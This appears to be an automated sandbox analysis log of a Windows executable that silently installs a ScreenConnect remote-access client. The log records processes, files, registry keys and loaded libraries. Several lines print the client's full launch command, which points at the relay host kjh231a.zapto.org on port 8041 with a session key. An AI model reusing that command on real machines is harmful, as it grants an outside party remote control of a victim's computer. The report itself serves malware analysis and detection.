                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49702 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49725 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  Source: Qjq85KfhBC.exe PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648
                  Source: Qjq85KfhBC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal60.evad.winEXE@18/77@2/2
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00911000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7648
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCommand line argument: dfshim0_2_00911000
                  Source: Qjq85KfhBC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Qjq85KfhBC.exeReversingLabs: Detection: 23%
                  Source: unknownProcess created: C:\Users\user\Desktop\Qjq85KfhBC.exe "C:\Users\user\Desktop\Qjq85KfhBC.exe"
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 748
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "bd7f42b5-0144-4d3f-871e-9605118ce260" "User"
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 748
                  Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: dfshim.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
